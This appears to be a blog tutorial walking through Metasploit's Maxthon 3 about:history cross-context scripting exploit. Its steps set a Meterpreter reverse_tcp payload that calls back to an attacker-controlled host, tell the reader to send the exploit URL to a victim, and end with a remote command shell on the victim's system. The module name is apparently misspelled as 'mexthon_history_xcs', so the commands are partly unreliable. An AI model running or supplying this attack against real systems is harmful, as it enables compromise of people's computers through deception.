Maxthon3 about:history XCS Trusted Zone Code Execution
Cross Context Scripting (XCS) is possible in the Maxthon about:history page. Injection in such privileged/trusted browser zone can be used to modify configuration settings and execute arbitrary commands. Please note this module only works against specific versions of XCS. Currently, we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.
Exploit Targets :
- 0 - Maxthon 3 (prior to 3.3) on Windows (default)
Requirement :
Attacker : Backtrack
Victim : Windows
Step 1 : open terminal and type msfconsole metasploit framework
Step 2 : use exploit/windows/browser/mexthon_history_xcs
Step 3 : set payload windows/meterpreter/reverse_tcp
Step 4 : show options
Step 5 : set all the perimeters
set SRVHOST 192.168.56.102 (IP Address of the Local Machine)
set URIPATH / (root Address)
set LHOST 192.168.56.102 (Host IP Address)
Step 6 : exploit
Now the reverse handler is start on 192.168.56.102:4444 our host address and exploit is start on the url http://192.168.56.102:8080/ and we have to send this url to the victim machine as the victim click on the url we get the meterpreter sessions . Here we get the two meterpreter sessions let's check this by using command sessions -l this command shows us list of all the Active sessions
Now type sessions -i 1 to get the meterpreter sessions now let me check the sysinfo this command gives us the information about the remote system. now type shell to get into the remote system .
And now we have the cmand prompt of the remote system .
No comments:
Post a Comment